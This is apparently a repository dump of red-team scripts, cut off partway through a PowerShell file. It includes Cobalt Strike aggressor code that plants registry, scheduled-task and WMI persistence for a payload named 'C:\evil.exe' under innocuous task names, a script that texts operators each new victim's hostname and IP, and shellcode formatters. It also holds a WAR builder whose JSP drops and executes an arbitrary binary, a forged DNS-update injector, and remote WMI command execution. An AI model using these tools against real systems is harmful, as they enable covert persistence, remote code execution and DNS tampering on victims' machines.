├── CobaltScripts ├── beacontext.py ├── persist_assist.cna ├── removecomments.py ├── shellcode_formatter.ps1 ├── shellcodemodifier.py └── text_aggressor.cna ├── HostScripts ├── ColdWar.py ├── DNSInject.py ├── Invoke-WMITools.ps1 ├── ProcessArchDetection │ ├── .vs │ │ └── ProcessArchDetection │ │ │ └── v16 │ │ │ └── .suo │ ├── ProcessArchDetection.csproj │ ├── ProcessArchDetection.sln │ ├── Program.cs │ └── Properties │ │ └── AssemblyInfo.cs ├── ShareDumper.ps1 ├── enumeration.py └── keylogger.py ├── LICENSE ├── NetworkScripts ├── DNSReverser.py ├── IPSorter.py └── xbmc.py ├── README.md └── WebScripts ├── LinkFinder.py ├── ShodanSearch.py ├── WebTrace.rb ├── enum_server.py └── web └── server.pem /CobaltScripts/beacontext.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import argparse 4 | import smtplib 5 | from email.MIMEMultipart import MIMEMultipart 6 | from email.MIMEText import MIMEText 7 | 8 | parser = argparse.ArgumentParser(description='beacon info') 9 | parser.add_argument('--computer') 10 | parser.add_argument('--ip') 11 | args = parser.parse_args() 12 | 13 | fromaddr = "" 14 | toaddr = ["7777777777@txt.att.net", "8888888888@vtext.com"] 15 | msg = MIMEMultipart() 16 | msg['From'] = fromaddr 17 | msg['To'] = ", ".join(toaddr) 18 | msg['Subject'] = "INCOMING BEACON" 19 | 20 | hostname = args.computer 21 | internal_ip = args.ip 22 | 23 | body = "Check your teamserver! 
\nHostname - " + hostname + "\nInternal IP - " + internal_ip 24 | msg.attach(MIMEText(body, 'plain')) 25 | 26 | server = smtplib.SMTP('smtp.gmail.com', 587) 27 | server.starttls() 28 | server.login(fromaddr, "") 29 | text = msg.as_string() 30 | server.sendmail(fromaddr, toaddr, text) 31 | server.quit() 32 | -------------------------------------------------------------------------------- /CobaltScripts/persist_assist.cna: -------------------------------------------------------------------------------- 1 | # Thanks to bluescreenofjeff for his awesome scripts that act as reference! 2 | ############################################################################################################################################################## 3 | ######################################################### Global Variables ################################################################################### 4 | ############################################################################################################################################################## 5 | 6 | # Global Variables 7 | %globalsettings['RegHive'] = 'HKCU'; 8 | %globalsettings['RegPath'] = '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'; 9 | %globalsettings['RegValue'] = 'RandomKeyDFIR'; 10 | %globalsettings['PayloadPath'] = 'C:\\evil.exe'; 11 | %globalsettings['Action'] = 'Add'; 12 | %globalsettings['TaskName'] = 'AppleUpdater'; 13 | %globalsettings['TaskTrigger'] = 'HOURLY'; 14 | %globalsettings['TaskTime'] = '03:45:50'; 15 | %globalsettings['WMIName'] = 'AppleUpdater'; 16 | 17 | ############################################################################################################################################################## 18 | ################################################# Registry Persistence Section ############################################################################### 19 | 
############################################################################################################################################################## 20 | 21 | # Registry Persistence Section 22 | 23 | sub add_regkey { 24 | # PowerShell command to run 25 | $ppick_add = 'New-ItemProperty -Path "' . $2['RegHive'] . ":" . $2['RegPath'] . '" -Name "' . $2['RegValue'] . '" -PropertyType String -Value "' . $2['PayloadPath'] . '"'; 26 | 27 | if(-isadmin $1) { 28 | binput($1, "Installing registry persistence"); 29 | bpowerpick($1, $ppick_add); 30 | } 31 | else { 32 | $lc_hive = lc($2['RegHive']); 33 | if ($lc_hive hasmatch "hklm") { 34 | berror($1, "You can't write to HKLM without admin rights!"); 35 | } 36 | else { 37 | binput($1, "Installing registry persistence"); 38 | bpowerpick($1, $ppick_add); 39 | } 40 | } 41 | } 42 | 43 | sub remove_regkey { 44 | $ppick_remove = 'Remove-ItemProperty -Path "' . $2['RegHive'] . ":" . $2['RegPath'] . '" -Name "' . $2['RegValue'] . '"'; 45 | if(-isadmin $1) { 46 | binput($1, "Removing Registry Persistence"); 47 | bpowerpick($1, $ppick_remove); 48 | } 49 | else { 50 | $lc_hive = lc($2['RegHive']); 51 | if ($lc_hive hasmatch "hklm") { 52 | berror($1, "You can't remove from HKLM without admin rights!"); 53 | } 54 | else { 55 | binput($1, "Removing registry persistence"); 56 | bpowerpick($1, $ppick_remove); 57 | } 58 | } 59 | } 60 | 61 | sub reg_method { 62 | # Find the proper beacon ID to use 63 | foreach $beacon (beacons()) { 64 | if ($3['Target'] eq $beacon['pid']) { 65 | $incoming_regmethod = lc($3['Action']); 66 | if ($incoming_regmethod eq 'add') { 67 | add_regkey($beacon['id'], $3); 68 | } 69 | else if ($incoming_regmethod eq 'remove') { 70 | remove_regkey($beacon['id'], $3); 71 | } 72 | else { 73 | berror($1, 'You did not provide a valid action to take! 
[Add] or [Remove]!'); 74 | println('hit error block'); 75 | } 76 | } 77 | } 78 | clear($3); 79 | } 80 | 81 | sub reg_persistence { 82 | # Get all process IDs of selected beacons 83 | @total_proc_ids = @(); 84 | foreach $beacon (beacons()) { 85 | add(@total_proc_ids, $beacon['pid']); 86 | } 87 | 88 | $dialogbox = dialog("Registry Persistence", %(RegHive => %globalsettings['RegHive'], RegPath => %globalsettings['RegPath'], RegValue => %globalsettings['RegValue'], PayloadPath => %globalsettings['PayloadPath'], Action => %globalsettings['Action'], Target => @total_proc_ids), ®_method); 89 | dialog_description($dialogbox, "Set or remove registry based persistence"); 90 | 91 | drow_text($dialogbox, "RegHive", "Registry Hive:"); 92 | drow_text($dialogbox, "RegPath", "Registry Path:"); 93 | drow_text($dialogbox, "RegValue", "Registry Value:"); 94 | drow_text($dialogbox, "PayloadPath", "Payload:"); 95 | drow_combobox($dialogbox, "Action", "Add or Remove:", @('Add', 'Remove')); 96 | drow_combobox($dialogbox, "Target", "Targeted System (PID):", @total_proc_ids); 97 | dbutton_action($dialogbox, "Launch"); 98 | 99 | dialog_show($dialogbox); 100 | clear(@total_proc_ids); 101 | } 102 | 103 | ############################################################################################################################################################## 104 | ###################################################### Scheduled Task Section ################################################################################ 105 | ############################################################################################################################################################## 106 | 107 | # Scheduled task section 108 | 109 | sub add_task { 110 | # PowerShell command to run 111 | $shell_add = 'schtasks /create /tn "' . $2['TaskName'] . '" /tr "' . $2['Payload'] . '" /sc ' . $2['TaskTrigger'] . ' /st ' . 
$2['TaskTime']; 112 | 113 | # Create the task 114 | binput($1, "Installing scheduled task persistence"); 115 | bpowerpick($1, $shell_add); 116 | } 117 | 118 | sub remove_task { 119 | $shell_remove = 'schtasks /delete /tn "' . $2['TaskName'] . '" /F'; 120 | 121 | # Delete the task 122 | binput($1, "Removing scheduled task persistence"); 123 | bpowerpick($1, $shell_remove); 124 | } 125 | 126 | sub sch_task_persistence { 127 | # Get all process IDs of selected beacons 128 | @total_proc_ids = @(); 129 | foreach $beacon (beacons()) { 130 | add(@total_proc_ids, $beacon['pid']); 131 | } 132 | 133 | $dialogbox = dialog("Scheduled Task Persistence", %(TaskName => %globalsettings['TaskName'], TaskTime => %globalsettings['TaskTime'], Payload => %globalsettings['PayloadPath'], TaskTrigger => %globalsettings['TaskTrigger'], Action => %globalsettings['Action'], Target => $1), &task_method); 134 | 135 | drow_text($dialogbox, "TaskName", "Scheduled Task Name:"); 136 | drow_text($dialogbox, "TaskTime", "Scheduled Task Trigger Time:"); 137 | drow_text($dialogbox, "TaskTrigger", "Scheduled Task Trigger:"); 138 | drow_text($dialogbox, "Payload", "Payload:"); 139 | drow_combobox($dialogbox, "Action", "Add or Remove:", @('Add', 'Remove')); 140 | drow_combobox($dialogbox, "Target", "Targeted System (PID):", @total_proc_ids); 141 | dbutton_action($dialogbox, "Launch"); 142 | 143 | dialog_show($dialogbox); 144 | clear(@total_proc_ids); 145 | } 146 | 147 | sub task_method { 148 | # Find the proper beacon ID to use 149 | foreach $beacon (beacons()) { 150 | if ($3['Target'] eq $beacon['pid']) { 151 | $incoming_taskmethod = lc($3['Action']); 152 | if ($incoming_taskmethod eq 'add') { 153 | add_task($beacon['id'], $3); 154 | } 155 | else if ($incoming_taskmethod eq 'remove') { 156 | remove_task($beacon['id'], $3); 157 | } 158 | else { 159 | berror($1, 'You did not provide a valid action to take! 
[Add] or [Remove]!'); 160 | println('hit error block'); 161 | } 162 | } 163 | } 164 | clear($3); 165 | } 166 | 167 | ############################################################################################################################################################## 168 | ########################################################### WMI Based Persistence ############################################################################ 169 | ############################################################################################################################################################## 170 | 171 | # WMI based persistence 172 | 173 | sub add_wmi { 174 | if(-isadmin $1) { 175 | # PowerShell command to run 176 | $wmi_add = "\$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='" . $2['WMIName'] . "';EventNameSpace='root\\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 201 AND TargetInstance.SystemUpTime < 323\"};\$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name='" . $2['WMIName'] . "';CommandLineTemplate ='" . $2['Payload'] . "'};Set-WmiInstance -Namespace \"root\\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=\$Filter;Consumer=\$Consumer};"; 177 | 178 | # Install WMI persistence 179 | binput($1, "Installing wmi persistence"); 180 | bpowerpick($1, $wmi_add); 181 | } 182 | else { 183 | berror($1, "You can't install WMI persistence without admin rights!"); 184 | } 185 | } 186 | 187 | sub remove_wmi { 188 | if(-isadmin $1) { 189 | $wmi_remove1 = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='" . $2['WMIName'] . "'\"| Remove-WmiObject"; 190 | $wmi_remove2 = "Get-WmiObject CommandLineEventConsumer -Namespace root\\subscription -filter \"name='" . $2['WMIName'] . 
"'\" | Remove-WmiObject"; 191 | $wmi_remove3 = "Get-WmiObject __FilterToConsumerBinding -Namespace root\\subscription | Where-Object { \$_.filter -match '" . $2['WMIName'] . "'} | Remove-WmiObject"; 192 | 193 | # Delete wmi persistence 194 | binput($1, "Removing wmi persistence"); 195 | bpowerpick($1, $wmi_remove1); 196 | bpowerpick($1, $wmi_remove2); 197 | bpowerpick($1, $wmi_remove3); 198 | } 199 | else { 200 | berror($1, "You can't remove WMI persistence without admin rights!"); 201 | } 202 | 203 | } 204 | 205 | sub wmi_persistence { 206 | # Get all process IDs of selected beacons 207 | @total_proc_ids = @(); 208 | foreach $beacon (beacons()) { 209 | add(@total_proc_ids, $beacon['pid']); 210 | } 211 | 212 | $dialogbox = dialog("WMI Persistence", %(WMIName => %globalsettings['WMIName'], Payload => %globalsettings['PayloadPath'], Action => %globalsettings['Action'], Target => $1), &wmi_method); 213 | 214 | drow_text($dialogbox, "WMIName", "WMI Name:"); 215 | drow_text($dialogbox, "Payload", "Payload:"); 216 | drow_combobox($dialogbox, "Action", "Add or Remove:", @('Add', 'Remove')); 217 | drow_combobox($dialogbox, "Target", "Targeted System (PID):", @total_proc_ids); 218 | dbutton_action($dialogbox, "Launch"); 219 | 220 | dialog_show($dialogbox); 221 | clear(@total_proc_ids); 222 | } 223 | 224 | sub wmi_method { 225 | # Find the proper beacon ID to use 226 | foreach $beacon (beacons()) { 227 | if ($3['Target'] eq $beacon['pid']) { 228 | $incoming_taskmethod = lc($3['Action']); 229 | if ($incoming_taskmethod eq 'add') { 230 | add_wmi($beacon['id'], $3); 231 | } 232 | else if ($incoming_taskmethod eq 'remove') { 233 | remove_wmi($beacon['id'], $3); 234 | } 235 | else { 236 | berror($1, 'You did not provide a valid action to take! 
[Add] or [Remove]!'); 237 | println('hit error block'); 238 | } 239 | } 240 | } 241 | clear($3); 242 | } 243 | 244 | ############################################################################################################################################################## 245 | ########################################################### Pop-Up Menu Section ############################################################################## 246 | ############################################################################################################################################################## 247 | 248 | # Pop-up Menu Section 249 | 250 | popup beacon_bottom { 251 | item "Registry Persistence" { 252 | reg_persistence($1); 253 | } 254 | item "Scheduled Task Persistence" { 255 | sch_task_persistence($1); 256 | } 257 | item "WMI Persistence" { 258 | wmi_persistence($1); 259 | } 260 | } -------------------------------------------------------------------------------- /CobaltScripts/removecomments.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | #remove comments from PowerShell scripts 4 | currently_code = True 5 | 6 | with open('/root/Downloads/powersql.ps1', 'r') as readtest: 7 | psup_contents = readtest.readlines() 8 | 9 | with open('/root/Downloads/stripped.ps1', 'w') as removed: 10 | for line in psup_contents: 11 | line = line.lstrip() 12 | 13 | if line.startswith("#") and not line.startswith("#>"): 14 | pass 15 | 16 | elif line.startswith("<#"): 17 | currently_code = False 18 | 19 | elif line.startswith('\n'): 20 | pass 21 | 22 | elif line.startswith("#>"): 23 | currently_code = True 24 | 25 | else: 26 | if currently_code: 27 | removed.write(line) 28 | 29 | -------------------------------------------------------------------------------- /CobaltScripts/shellcode_formatter.ps1: -------------------------------------------------------------------------------- 1 | $fileName = 
"C:\Users\User\Desktop\payload.bin" 2 | $fileContent = [IO.File]::ReadAllBytes($fileName) 3 | $filecontentsencoded = [convert]::ToBase64String($fileContent) 4 | "Binary Blob base64 encoded:`n`n" + $filecontentsencoded | set-content ($fileName + ".b64") 5 | 6 | $scformat = '\x' + (($fileContent | ForEach-Object ToString x2) -join '\x') 7 | "`nStandard shellcode format:`n`n" + $scformat | add-content ($fileName + ".b64") 8 | 9 | $csharpformat = '0x' + (($fileContent | ForEach-Object ToString x2 | ForEach-Object { $_ + ',' }) -join '0x') 10 | $csharpformat = $csharpformat.SubString(0, $csharpformat.Length-1) 11 | "`nC# formatted shellcode:`n`n" + $csharpformat | add-content ($fileName + ".b64") 12 | 13 | $Bytes = [System.Text.Encoding]::UTF8.GetBytes($csharpformat) 14 | $EncodedText =[Convert]::ToBase64String($Bytes) 15 | "`nBase64 Encoded C# shellcode:`n`n" + $EncodedText | add-content ($fileName + ".b64") 16 | 17 | $fsharpformat = '0x' + (($fileContent | ForEach-Object ToString x2 | ForEach-Object { $_ + 'uy;' }) -join '0x') 18 | $fsharpformat = $fsharpformat.SubString(0, $fsharpformat.Length-1) 19 | "`nF# formatted shellcode:`n`n" + $fsharpformat | add-content ($fileName + ".b64") -------------------------------------------------------------------------------- /CobaltScripts/shellcodemodifier.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import base64 3 | 4 | # Edit this line with the path to the binary file containing shellcode you are converting 5 | with open('/home/user/Downloads/payload.bin', 'rb') as sc_handle: 6 | sc_data = sc_handle.read() 7 | 8 | # Just raw binary blog base64 encoded 9 | encoded_raw = base64.b64encode(sc_data) 10 | 11 | # Print in "standard" shellcode format \x41\x42\x43.... 
12 | binary_code = '' 13 | fs_code = '' 14 | for byte in sc_data: 15 | binary_code += "\\x" + hex(byte)[2:].zfill(2) 16 | # this is for f# 17 | fs_code += "0x" + hex(byte)[2:].zfill(2) + "uy;" 18 | 19 | # Convert this into a C# style shellcode format 20 | cs_shellcode = "0" + ",0".join(binary_code.split("\\")[1:]) 21 | 22 | # Base 64 encode the C# code (for use with certain payloads :)) 23 | encoded_cs = base64.b64encode(cs_shellcode.encode()) 24 | 25 | # Write out the files to disk (edit this path as needed) 26 | with open('formatted_shellcode.txt', 'w') as format_out: 27 | format_out.write("Size in bytes is: " + str(len(sc_data)) + "\n\n") 28 | format_out.write("Binary Blob base64 encoded:\n\n") 29 | format_out.write(encoded_raw.decode('ascii')) 30 | format_out.write("\n\nStandard shellcode format:\n\n") 31 | format_out.write(binary_code) 32 | format_out.write("\n\nC# formatted shellcode:\n\n") 33 | format_out.write(cs_shellcode) 34 | format_out.write("\n\nBase64 Encoded C# shellcode:\n\n") 35 | format_out.write(encoded_cs.decode('ascii')) 36 | format_out.write("\n\nF# Shellcode:\n\n") 37 | format_out.write(fs_code) 38 | format_out.write("\n") 39 | -------------------------------------------------------------------------------- /CobaltScripts/text_aggressor.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | local('$computer'); 3 | local('$internal'); 4 | $computer = beacon_info($1, "computer"); 5 | $internal = beacon_info($1, "internal"); 6 | exec("/root/cobaltstrike/emailme.py --ip " . $internal . " --computer '" . $computer . 
"'"); 7 | } 8 | -------------------------------------------------------------------------------- /HostScripts/ColdWar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # This script is designed to take an executable and create a .war file 4 | # This is obviously used for pentesting purposes and executing arbitrary .exe files 5 | # All research came from the awesome metasploit project - 99% of the code logic was from metasploit 6 | # Link to their payload generation is here - https://github.com/rapid7/metasploit-framework/blob/d483f2ad79754b3353ed18784e97bbe6c1489b0b/lib/rex/zip/samples/mkwar.rb 7 | 8 | import argparse 9 | from binascii import hexlify 10 | import zipfile 11 | import random 12 | import string 13 | import os 14 | import sys 15 | 16 | # Code used from our Veil Project to generate random characters 17 | def randomString(length=-1): 18 | """ 19 | Returns a random string of "length" characters. 20 | If no length is specified, resulting string is in between 6 and 15 characters. 21 | """ 22 | if length == -1: length = random.randrange(6,16) 23 | random_string = ''.join(random.choice(string.ascii_letters) for x in range(length)) 24 | return random_string 25 | 26 | # Command line argument parser 27 | parser = argparse.ArgumentParser(description="Convert your executable into a .war file.") 28 | parser.add_argument("-exe", help="Path to the .exe you wish to convert to a .war file") 29 | parser.add_argument("-out", help="Output path of .war file") 30 | args = parser.parse_args() 31 | 32 | # Quick error checking 33 | if not args.exe: 34 | print "You didn't give me an executable via the CLI..." 35 | sys.exit() 36 | 37 | if not args.out: 38 | print "You didn't provide an output path for the .war file..." 
39 | sys.exit() 40 | 41 | # Set up all our variables 42 | var_hexpath = randomString() 43 | var_exepath = randomString() 44 | var_data = randomString() 45 | var_inputstream = randomString() 46 | var_outputstream = randomString() 47 | var_numbytes = randomString() 48 | var_bytearray = randomString() 49 | var_bytes = randomString() 50 | var_counter = randomString() 51 | var_char1 = randomString() 52 | var_char2 = randomString() 53 | var_comb = randomString() 54 | var_exe = randomString() 55 | var_hexfile = randomString() 56 | var_proc = randomString() 57 | var_name = randomString() 58 | var_payload = randomString() 59 | 60 | # text file containing the executable 61 | try: 62 | raw = open(args.exe, 'rb').read() 63 | txt_exe = hexlify(raw) 64 | txt_payload_file = open(var_hexfile + ".txt", 'w') 65 | txt_payload_file.write(txt_exe) 66 | txt_payload_file.close() 67 | except IOError: 68 | print "ERROR: You didn't provide the path to an executable" 69 | sys.exit() 70 | 71 | # Set up our JSP files used for triggering the payload within the war file 72 | jsp_payload = "<%@ page import=\"java.io.*\" %>\n" 73 | jsp_payload += "<%\n" 74 | jsp_payload += "String " + var_hexpath + " = application.getRealPath(\"/\") + \"" + var_hexfile + ".txt\";\n" 75 | jsp_payload += "String " + var_exepath + " = System.getProperty(\"java.io.tmpdir\") + \"/" + var_exe + "\";\n" 76 | jsp_payload += "String " + var_data + " = \"\";\n" 77 | jsp_payload += "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" 78 | jsp_payload += var_exepath + " = " + var_exepath + ".concat(\".exe\");\n" 79 | jsp_payload += "}\n" 80 | jsp_payload += "FileInputStream " + var_inputstream + " = new FileInputStream(" + var_hexpath + ");\n" 81 | jsp_payload += "FileOutputStream " + var_outputstream + " = new FileOutputStream(" + var_exepath + ");\n" 82 | jsp_payload += "int " + var_numbytes + " = " + var_inputstream + ".available();\n" 83 | jsp_payload += "byte " + var_bytearray + "[] = new 
byte[" + var_numbytes + "];\n" 84 | jsp_payload += var_inputstream + ".read(" + var_bytearray + ");\n" 85 | jsp_payload += var_inputstream + ".close();\n" 86 | jsp_payload += "byte[] " + var_bytes + " = new byte[" + var_numbytes + "/2];\n" 87 | jsp_payload += "for (int " + var_counter + " = 0; " + var_counter + " < " + var_numbytes + "; " + var_counter + " += 2)\n" 88 | jsp_payload += "{\n" 89 | jsp_payload += "char " + var_char1 + " = (char) " + var_bytearray + "[" + var_counter + "];\n" 90 | jsp_payload += "char " + var_char2 + " = (char) " + var_bytearray + "[" + var_counter+ " + 1];\n" 91 | jsp_payload += "int " + var_comb + " = Character.digit(" + var_char1 + ", 16) & 0xff;\n" 92 | jsp_payload += var_comb + " <<= 4;\n" 93 | jsp_payload += var_comb + " += Character.digit(" + var_char2 + ", 16) & 0xff;\n" 94 | jsp_payload += var_bytes + "[" + var_counter + "/2] = (byte)" + var_comb + ";\n" 95 | jsp_payload += "}\n" 96 | jsp_payload += var_outputstream + ".write(" + var_bytes + ");\n" 97 | jsp_payload += var_outputstream + ".close();\n" 98 | jsp_payload += "Process " + var_proc + " = Runtime.getRuntime().exec(" + var_exepath + ");\n" 99 | jsp_payload += "%>\n" 100 | 101 | jsp_file_out = open(var_payload + ".jsp", 'w') 102 | jsp_file_out.write(jsp_payload) 103 | jsp_file_out.close() 104 | 105 | # MANIFEST.MF file contents 106 | manifest_file = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n" 107 | man_file = open("MANIFEST.MF", 'w') 108 | man_file.write(manifest_file) 109 | man_file.close() 110 | 111 | # web.xml file contents 112 | web_xml_contents = "\n" 113 | web_xml_contents += "\n" 116 | web_xml_contents += "\n" 117 | web_xml_contents += "\n" 118 | web_xml_contents += "" + var_name + "\n" 119 | web_xml_contents += "/" + var_payload + ".jsp\n" 120 | web_xml_contents += "\n" 121 | web_xml_contents += "\n" 122 | 123 | # Create our web.xml files 124 | xml_file = open("web.xml", 'w') 125 | xml_file.write(web_xml_contents) 126 | 
xml_file.close() 127 | 128 | # Create our directories needed for the war file 129 | os.system("mkdir META-INF") 130 | os.system("mkdir WEB-INF") 131 | os.system("mv web.xml WEB-INF/") 132 | os.system("mv MANIFEST.MF META-INF/") 133 | 134 | # Make the war file by zipping everything together 135 | # Some ideas from - http://stackoverflow.com/questions/458436/adding-folders-to-a-zip-file-using-python 136 | myZipFile = zipfile.ZipFile(args.out, "w" ) 137 | myZipFile.write(var_payload + ".jsp", var_payload + ".jsp", zipfile.ZIP_DEFLATED) 138 | myZipFile.write(var_hexfile + ".txt", var_hexfile + ".txt", zipfile.ZIP_DEFLATED) 139 | myZipFile.write("META-INF/MANIFEST.MF", "META-INF/MANIFEST.MF", zipfile.ZIP_DEFLATED) 140 | myZipFile.write("WEB-INF/web.xml", "WEB-INF/web.xml", zipfile.ZIP_DEFLATED) 141 | myZipFile.close() 142 | 143 | # Clean up the individual files, you can always unzip the war to see them again 144 | os.system("rm -rf WEB-INF") 145 | os.system("rm -rf META-INF") 146 | os.system("rm " + var_payload + ".jsp") 147 | os.system("rm " + var_hexfile + ".txt") -------------------------------------------------------------------------------- /HostScripts/DNSInject.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # by Chris Truncer 3 | 4 | # Script to attempt to forge a packet that will inject a new value 5 | # for a dns record. Check nessus plugin #35372 6 | # Some great documentation and sample code came from: 7 | # http://bb.secdev.org/scapy/src/46e0b3e619547631d704c133a0247cf4683c0784/scapy/layers/dns.py 8 | 9 | 10 | import argparse 11 | import logging 12 | # I know it's bad practice to add code up here, but it's the only way I could 13 | # see to suppress the IPv6 warning from scapy (By setting this 14 | # before importing scapy). 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import os
from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, sr1
import sys


def add_a_record(name_server, new_dns_record, ip_value):
    """Send one DNS UPDATE (opcode 5) asking name_server to add an A record.

    The zone is taken to be everything after the first label of
    new_dns_record. The update section carries a single A record for
    new_dns_record with a TTL of 120 pointing at ip_value, and the
    summary of the reply is printed.

    The message is sent unsigned, so a server applies it only when it
    accepts unauthenticated dynamic updates. Requiring TSIG-signed
    updates or an update ACL on the zone is the corresponding mitigation.

    Exits through sys.exit() when any of the three arguments is None.
    """
    os.system('clear')
    title()

    # All three values come from optional command line flags, so each one
    # may still be None at this point.
    # Single-argument print(...) behaves the same as the Python 2 print
    # statement used elsewhere in this file.
    supplied = (name_server, new_dns_record, ip_value)
    if any(value is None for value in supplied):
        print("[*] ERROR: You did not provide all the required command line options!")
        print("[*] ERROR: Please re-run with required options.")
        sys.exit()

    print("[*] Crafting packet for record injection...")
    print("[*] Sending DNS packet adding " + new_dns_record)
    print("[*] and pointing it to " + ip_value + "\n")

    # Zone name = the record name with its first label removed. When the
    # name holds no dot, find() returns -1 and the whole name is used.
    first_dot = new_dns_record.find(".")
    dns_zone = new_dns_record[first_dot + 1:]

    # Zone section (SOA question) and update section (the new A record).
    zone_section = [DNSQR(qname=dns_zone, qtype="SOA")]
    update_section = [DNSRR(rrname=new_dns_record,
                            type="A", ttl=120, rdata=ip_value)]
    update_message = DNS(opcode=5, qd=zone_section, ns=update_section)

    # NOTE(review): sr1() is called without a timeout and returns None when
    # no reply is captured; the subscript below would then raise.
    add_packet = sr1(IP(dst=name_server)/UDP()/update_message)

    print(add_packet[DNS].summary())

    print("\n[*] Packet created and sent!")


def cli_parser():
    """Parse the command line and return (add, delete, ns, d, ip).

    argparse's built-in help is disabled; a hidden store_true option with
    several spellings (-h, -?, --h, -help, --help) prints the help text
    and exits instead.
    """
    parser = argparse.ArgumentParser(
        add_help=False,
        description="DNSInject is a tool for modifying DNS records on vulnerable servers.")

    # Action switches. Nothing here stops both being given; the entry
    # point checks --add first.
    for flag, help_text in (
            ("--add", "Add \"A\" record to the vulnerable name server."),
            ("--delete", "Delete \"A\" record from the vulnerable name server.")):
        parser.add_argument(flag, action='store_true', help=help_text)

    # Value options; all are optional here and validated by the action
    # functions, which check for None.
    for flag, example, help_text in (
            ("-ns", "ns1.test.com", "Nameserver to execute the specified action."),
            ("-d", "mynewarecord.test.com", "Domain name to create an A record for."),
            ("-ip", "192.168.1.1", "IP Address the new record will point to.")):
        parser.add_argument(flag, metavar=example, help=help_text)

    parser.add_argument(
        '-h', '-?', '--h', '-help', '--help', action="store_true",
        help=argparse.SUPPRESS)
    parsed = parser.parse_args()

    if parsed.h:
        parser.print_help()
        sys.exit()

    return parsed.add, parsed.delete, parsed.ns, parsed.d, parsed.ip


def delete_dns_record(del_ns, del_record):
    """Send one DNS UPDATE (opcode 5) asking del_ns to delete del_record.

    The zone is everything after the first label of del_record. The
    update section carries one record for del_record with type ALL,
    class ANY, TTL 0 and empty rdata. The reply's summary is printed.

    Exits through sys.exit() when either argument is None.
    """
    os.system('clear')
    title()

    # Both values come from optional command line flags.
    # Single-argument print(...) behaves the same as the Python 2 print
    # statement this file was written with.
    if any(value is None for value in (del_ns, del_record)):
        print("[*] ERROR: You did not provide all the required command line options!")
        print("[*] ERROR: Please re-run with required options.")
        sys.exit()
    print("[*] Crafting packet for record deletion...")

    print("[*] Sending packet which deletes the following record: ")
    print("[*] " + del_record + "\n")

    first_dot = del_record.find(".")
    dns_zone = del_record[first_dot + 1:]

    # NOTE(review): the CLI help describes this as deleting an "A" record,
    # but type ALL with class ANY is not limited to A records - confirm
    # the intended scope.
    zone_section = [DNSQR(qname=dns_zone, qtype="SOA")]
    update_section = [DNSRR(rrname=del_record, type="ALL",
                            rclass="ANY", ttl=0, rdata="")]
    update_message = DNS(opcode=5, qd=zone_section, ns=update_section)

    # NOTE(review): sr1() is called without a timeout and returns None when
    # no reply is captured; the subscript below would then raise.
    del_packet = sr1(IP(dst=del_ns)/UDP()/update_message)

    print(del_packet[DNS].summary())

    print("\n[*] Packet created and sent!")


def title():
    """Print the three-line tool banner."""
    rule = "######################################################################"
    print(rule)
    print("# DNS Injector #")
    print(rule + "\n")


if __name__ == '__main__':

    # Parse command line arguments
    action_add, action_delete, dns_nameserver, dns_record, dns_ip = cli_parser()

    # Dispatch on the chosen action; --add takes precedence over --delete.
    try:
        if not (action_add or action_delete):
            print("[*] ERROR: You didn't provide a valid action.")
            print("[*] ERROR: Restart and provide your desired action!")
            sys.exit()

        if action_add:
            add_a_record(dns_nameserver, dns_record, dns_ip)
        else:
            delete_dns_record(dns_nameserver, dns_record)
    except AttributeError:
        # Any AttributeError raised while running the action is reported
        # with the same "no valid action" message.
        os.system('clear')
        title()
        print("[*] ERROR: You didn't provide a valid action.")
        print("[*] ERROR: Restart and provide your desired action!")
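--------------------------------------------------------------------------------
/HostScripts/Invoke-WMITools.ps1:
--------------------------------------------------------------------------------
#requires -version 2


function Invoke-WorkerWmiExecCommand
{
    <#
    .SYNOPSIS
    Worker that starts one process through WMI (win32_process create), locally or on the given targets.

    .DESCRIPTION
    When both -User and -Pass are supplied, a PSCredential is built from them and the create
    call is sent to the hosts in -Targets. Otherwise the call runs against the local machine
    and -Targets is not used.

    -Pass is taken as a plain string and converted with ConvertTo-SecureString -AsPlainText,
    so the password can end up in shell history and in PowerShell or process command-line
    logging where that is enabled.
    #>
    param
    (
        #Parameter assignment
        [Parameter(Mandatory = $False)]
        [string]$User,
        [Parameter(Mandatory = $False)]
        [string]$Pass,
        [Parameter(Mandatory = $False)]
        [string[]]$Targets = ".",
        [Parameter(Mandatory = $True)]
        [string]$Command
    )

    if($User -and $Pass)
    {
        # Explicit credentials supplied: start the process on the listed targets via WMI
        $password = ConvertTo-SecureString $Pass -asplaintext -force
        $cred = New-Object -Typename System.Management.Automation.PSCredential -argumentlist $User,$password

        Invoke-WmiMethod -class win32_process -name create -Argumentlist $Command -Credential $cred -Computername $Targets
    }

    else
    {
        # No credentials: run the command on the machine the script is loaded on
        Invoke-WmiMethod -class win32_process -name create -Argumentlist $Command
    }
}

function Invoke-WorkerWmiKillProcess
{
    <#
    .SYNOPSIS
    Worker that terminates processes through WMI, selected by name or by process ID.

    .DESCRIPTION
    Builds a win32_Process filter from -ProcName (checked first) or -ProcID and calls
    Terminate() on every match. With both -User and -Pass the query is sent to each host in
    -Targets using those credentials; otherwise it runs against the local machine.

    The selector value is interpolated into the filter as-is, so a value containing a single
    quote yields an invalid filter.

    -Pass is taken as a plain string and converted with ConvertTo-SecureString -AsPlainText,
    so the password can end up in shell history and in PowerShell or process command-line
    logging where that is enabled.
    #>
    param
    (
        #Parameter assignment
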